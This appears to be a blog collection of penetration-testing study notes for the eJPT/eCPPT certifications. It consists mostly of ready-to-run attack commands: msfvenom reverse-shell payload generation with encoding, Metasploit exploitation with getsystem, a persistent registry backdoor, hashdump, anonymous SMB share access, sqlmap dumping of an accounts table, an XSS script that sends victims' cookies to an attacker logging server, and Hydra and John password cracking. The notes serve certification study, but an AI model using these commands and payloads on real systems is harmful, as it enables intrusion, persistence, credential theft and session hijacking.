[eJPT][metasploit][msfvenom][meterpreter]msfvenom -- the backdoor function of Metasploit

#Reference: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


*****Generate the server side:*****
# msfvenom -l encoders
...
x86/shikata_ga_nai
...

# msfvenom -l payloads
...
linux/x86/meterpreter_reverse_tcp
...

# msfvenom -l formats
...
elf
elf-so
exe
...

# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxxx -e x86/shikata_ga_nai -i 5 -f elf -o ./test.out


*****The client side:*****
# /etc/init.d/postgresql start

# msfconsole
msf5> use exploit/multi/handler

msf5> search type:payload platform:linux

msf5> set payload payload/linux/x64/meterpreter_reverse_tcp

msf5> set LHOST xxx.xxx.xxx.xxx

msf5> exploit -j

msf5> sessions -l

[certificate]ISO 22301 LA

[certificate]ISO27001 LA & IA

[eJPT]Add a route in Kali

root@demonalex:~# ip route add 172.16.88.0/24 via 10.175.34.1

root@demonalex:~# netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
...
172.16.88.0     10.175.34.1     255.255.255.0   UG        0 0          0 tap0
...

root@demonalex:~# nmap -sn -n 172.16.88.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-25 11:57 EDT
Nmap scan report for 172.16.88.1
Host is up (0.059s latency).
Nmap scan report for 172.16.88.81
Host is up (0.062s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.87 seconds

[eJPT][metasploit][msfconsole]Metasploit Msfconsole Gameplay

#################################################Basic Gameplay
#/etc/init.d/postgresql start
#msfconsole
>search type:exploit platform:windows               <--Find the appropriate exploit
>use XX
>show options
...
>set XXX XXX
...
>show payloads
>set payload windows/meterpreter/reverse_tcp        <--Select a payload
>set LHOST XXX.XXX.XXX.XXX
>set EXITFUNC process
>run                                                <--Exploit
...
meterpreter>getuid
meterpreter>getsystem                               <--Privilege Escalation
meterpreter>getuid
meterpreter>background
>sessions -l
...



#################################################Install Persistent Backdoor
>use exploit/windows/local/persistence
>show options
...
>set reg_name XXX
>set exe_name XXX
>set startup SYSTEM
>set session 1
>set payload windows/meterpreter/reverse_tcp
>set exitfunc process
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set DisablePayloadHandler false
>exploit                                           <--Install a backdoor. Use exploit -j instead if not working.
...
>use exploit/multi/handler
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set payload windows/meterpreter/reverse_tcp
>exploit -j                                       <--Launch the backdoor client, namely Handler



#################################################Crack Passwords
>sessions -l
>sessions -i 1
meterpreter>hashdump                              <--Dump the hashes of all accounts as the output. Save the output as a file and use John to crack it.



#################################################Search and Download Files
meterpreter>search -f congrats.txt
meterpreter>download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

[eJPT][enum4linux][smbclient]Null Session

1) Use "enum4linux -n" to make sure if "<20>" exists:
#enum4linux -n 192.168.1.10

2) If "<20>" exists, it means Null Session could be exploited. Utilize the following command to get more details:
#enum4linux 192.168.1.10

3) If confirmed that Null Session exists, you can remotely list all share of the target:
#smbclient -L WORKGROUP -I 192.168.1.10 -N -U ""

4) You also can connect the remote server by applying the following command:
#smbclient \\\\192.168.1.10\\c$ -N -U ""

5) Download those files stored on the share drive:
smb: \> get Congratulations.txt

[eJPT][sqlmap]SQLMap Usage

1) First, find out the breach point, such as http://10.124.211.96/newsdetails.php?id=26.


2) Second, determine the databases:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 --dbs
----------------------------------------------------------------------------
[13:29:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:29:07] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
----------------------------------------------------------------------------


3) Third, determine tables:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd --tables
----------------------------------------------------------------------------
[13:30:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:30:37] [INFO] fetching tables for database: 'awd'
Database: awd
[3 tables]
+----------+
| accounts |
| awards   |
| news     |
+----------+
----------------------------------------------------------------------------


4) Forth, dump a table's data:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts --dump
----------------------------------------------------------------------------
Database: awd                                                                                                                                   
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id   | email                                               | password    | displayname       |
+------+-----------------------------------------------------+-------------+-------------------+
| 1    | admin@awdmgmt.labs                                  | S3cr3tBOFH  | Admin             |
| 2    | porta.elit.a@adipiscingMaurismolestie.net           | VUH74DYX6DO | Mallory Reed      |
...
----------------------------------------------------------------------------

5) Fifth, if the vulnerable link requires an extra authentication, attach the cookie with the scanning command:

# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts -p id --cookie="session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YSLwbA.3Bixl9Opr1vJ6WU4YLZZUohhDPw" --dump

...

[eJPT][eCPPT]Hijack Cookie through XSS

There are four components as follows:
- Attacker Client PC
- Attacker Logging Server
- Vulnerable Server
- Victim Client PC


1) Attacker: first finds a Vulnerable Server and its breach point.

2) Attacker: enter the following snippet in order to hijack the cookie kepts by Victim Client PC (P.S.: the IP address, 192.168.99.102, belongs to Attacker Logging Server in this example):
<script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>

3) Attacker: log into Attacker Logging Server (P.S.: it is 192.168.99.102 in this example), and execute the following command:
#nc -vv -k -l -p 80 >> /root/xss.log

4) Attacker: when Victim Client PC browses the Vulnerable Server, check the output of the command above.

5) Attacker: after obtaining the victim's cookie, utilize some browser Add-ons to change to the victim's cookie in an effort to hijack the victim's privilege. Among others, the Add-on called EditThisCookie is for Chromium, and another Add-on named Cookie Quick Manager is for FireFox.

[eJPT][Nessus]Installing Nessus v8.10 on 20200421

1) Download the deb file of Nessus from "https://www.tenable.com/downloads/nessus?loginAttempted=true", and store the deb file at /usr/local/sbin.

2) Install it as below shows:
#cd /usr/local/sbin
#dpkg -i ./Nessus-8.10.0-debian6_i386.deb

3) Start Nessus:
#/etc/init.d/nessusd start

4) Open a browser and access "https://127.0.0.1:8834".

5) After the webportal shows up, select "Nessus Essentials" before filling out a form in order to get the Activation Code. You then fill up the Activation Code offered by an email sent by Tenable before creating an Admin account. The installation is done.

[eJPT]Network Scan with Fping and Nmap

#fping -a -g 192.168.1.0/24 2>/dev/null
#nmap -sn 192.168.1.0/24

[eJPT][nmap]Windows Share Enumeration

Enumeration under Linux:
#nmblookup -a IP_ADDRESS
#smbclient -L //IP_ADDRESS -N

Enumeration under Windows:
>nbtstat -A IP_ADDRESS
>net view IP_ADDRESS

Enumeration with Nmap:
#ll /usr/share/nmap/scripts/|grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse
#nmap --script=smb-enum-users 192.168.1.10

Enumeration with Enum4Linux:
#enum4linux 192.168.1.10

[eJPT]Hydra Basic Usage

Crack Username and Password at the same time:
#hydra -L USERNAME_LIST.txt -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -L /usr/share/wordlists/accounts.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.1

Only crack Password:
#hydra -l USERNAME -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -l root -P /usr/share/wordlists/rockyou.txt telnet://192.168.0.2

Try a username-password pair:
#hydra -l USERNAME -p PASSWORD PROTOCOL://IP
example:
#hydra -l administrator -p test123!@# rdp://192.168.0.3

[eJPT]Password Dictionary

https://wiki.skullsecurity.org/Passwords

[eJPT]A security knowledge base called Seclists

#apt-get update
#apt-get install seclists
#cd /usr/share/seclists
#ll

[eJPT]Keepass2 -- A secure password vault

Reference: https://keepass.info/

Install KeePass2 in Kali:
#apt-get update
#apt-get install keepass2

[eJPT]John the Ripper Cheat Sheet

Combine passwd file with shadow file:
# unshadow ./passwd ./shadow > ./crackme

Brute force the combination file:
# john -incremental --users=root ./crackme
OR without specifying any user:
# john -incremental ./crackme

Dictionary Crack:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./crackme
OR with applying mangling rules:
# john --wordlist=/usr/share/wordlists/rockyou.txt  -rules ./crackme

Read what have been cracked:
# john --shown ./crackme

Crack others with John
1) Apply the following command to locate those commands being able to convert those encrypted into a hash:
# locate *2john
2) Export a hash from an encrypted file (e.g. RAR):
# rar2john ./encrypted.rar > ./encrypted.rar.hash
3) Crack it:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./encrypted.rar.hash

[eJPT]Directory Brute Force

1) OWASP DirBuster
In Kali, execute the following command:
# dirbuster
Enter the target's information and pick up Brute Force lists at /usr/share/dirbuster/wordlists before performing the scan.

2) DirB
In Kali, run the command below:
# dirb https://www.google.com /usr/share/dirb/wordlists/vulns/apache.txt

[python][eJPT] Check HTTP Verbs

#!/usr/bin/python3
#https://github.com/d3m0n4l3x/python/blob/master/toys/check_http_options.py
import http.client
import re

def convertTuple(tup):
    str =  ': '.join(tup)
    return str

target=input("Your Target: ")
port=input("TCP Port (default: 80): ")

if port == "":
    port=80

port=int(port)

conn = http.client.HTTPConnection(target, port)
conn.request("OPTIONS", "/")
r1 = conn.getresponse()

response = r1.getheaders()

for each_item in response:
    each_item=convertTuple(each_item)
    result=re.match( r'^allow: ', each_item.lower())
    if result:
        print(each_item)
        exit(0)


print("There is no Allow field!")

[eJPT]Utilizing HTTPrint to perform Banner Grabbing

HTTPrint is a tool helping carry out an automatic Banner Grabbing.

Examples are shown below:

# httprint -P0 -s /usr/share/httprint/signatures.txt -h 1.2.3.4
# httprint -P0 -s /usr/share/httprint/signatures.txt -h https://1.2.3.4

[eJPT]Connect SSL service with Raw Socket

Normally, there would be two tools being utilized for connecting SSL service with Raw Socket, and they are OpenSSL and NCat.

Examples are shown below:

# openssl s_client -connect mail.google.com:443

# ncat --ssl -vv mail.google.com 443

The output coming from OpenSSL shows more details.

[HTB][eJPT][eCPPT]Nmap Cheat Sheet

1) Network / Host Scan (through ICMP)
Scan a nework:
#nmap -sn -n 192.168.1.0/24
Scan the same network segment without using ARP scan:
#nmap -sn -n --disable-arp-ping 192.168.1.0/24


1.5) Network / Host Scan through ARP
Scan a network through ARP by using the command, nping:
#nping --arp-type ARP 192.168.0.0/24


2) Port Scan (covering TCP & UDP)
TCP Port Scan:
#nmap -Pn -sT -p23,80 192.168.1.80
UDP Port Scan:
#nmap -Pn -sU -p1-10 192.168.1.80


3) Service Scan
Do OS/Service scan against a TCP port of an IP:
#nmap -O -sV -sT -p 80 192.168.1.80
Do OS/Service scan against an IP through UDP scan:
#nmap -O -sV -sU 192.168.1.80


4) Vulnerability Scan
Upgrade scripts:
#nmap --script-updatedb
Common Script Scan against an IP:
#nmap -sC 192.168.1.80
Vulnerability Scan:
#nmap --script vuln 10.10.10.40
Apply only those SAFE scripts to the vulnerability scan:
#nmap --script safe 10.10.10.40
Apply all scripts to scan a target:
#nmap --script all 10.10.10.40

Vulnerability Scan with SearchSploit's assistance:
#searchsploit -u ; nmap 192.168.1.1 -sV --open -oX ~/nmap.xml ; searchsploit -v --nmap ~/nmap.xml > ./exploits.txt

5) Combination Scan
Scan all ports and corresponding vulnerabilities of multiple IP addresses:
#nmap -sT -sV -O -p- -T4 -sC 192.168.1.100,101,102


6) Sneaky Scan
SYN Scan:
#nmap -sS -sV 192.168.0.80
Decoy Scan:
#nmap -Pn -sT -D 192.168.0.88,172.16.0.13,10.0.0.13,ME 192.168.1.80
IDLE Scan (The zombie, such as the TCP443 port of 192.168.0.251 in the following case, has to be existing):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253


7) Filtering Determination Scan
Determine the existence of Firewall/Filtering by utilizing "-sA" scan:
#nmap -sA -p- -T4 -n 192.168.0.0/24

[eJPT]Discovering a subdomain of a target

Below shows three means easily helping pinpoint subdomains:

1) Google Hacking
site:company.com

2) Use https://dnsdumpster.com/

3) Utilize sublist3r
sublist3r -d company.com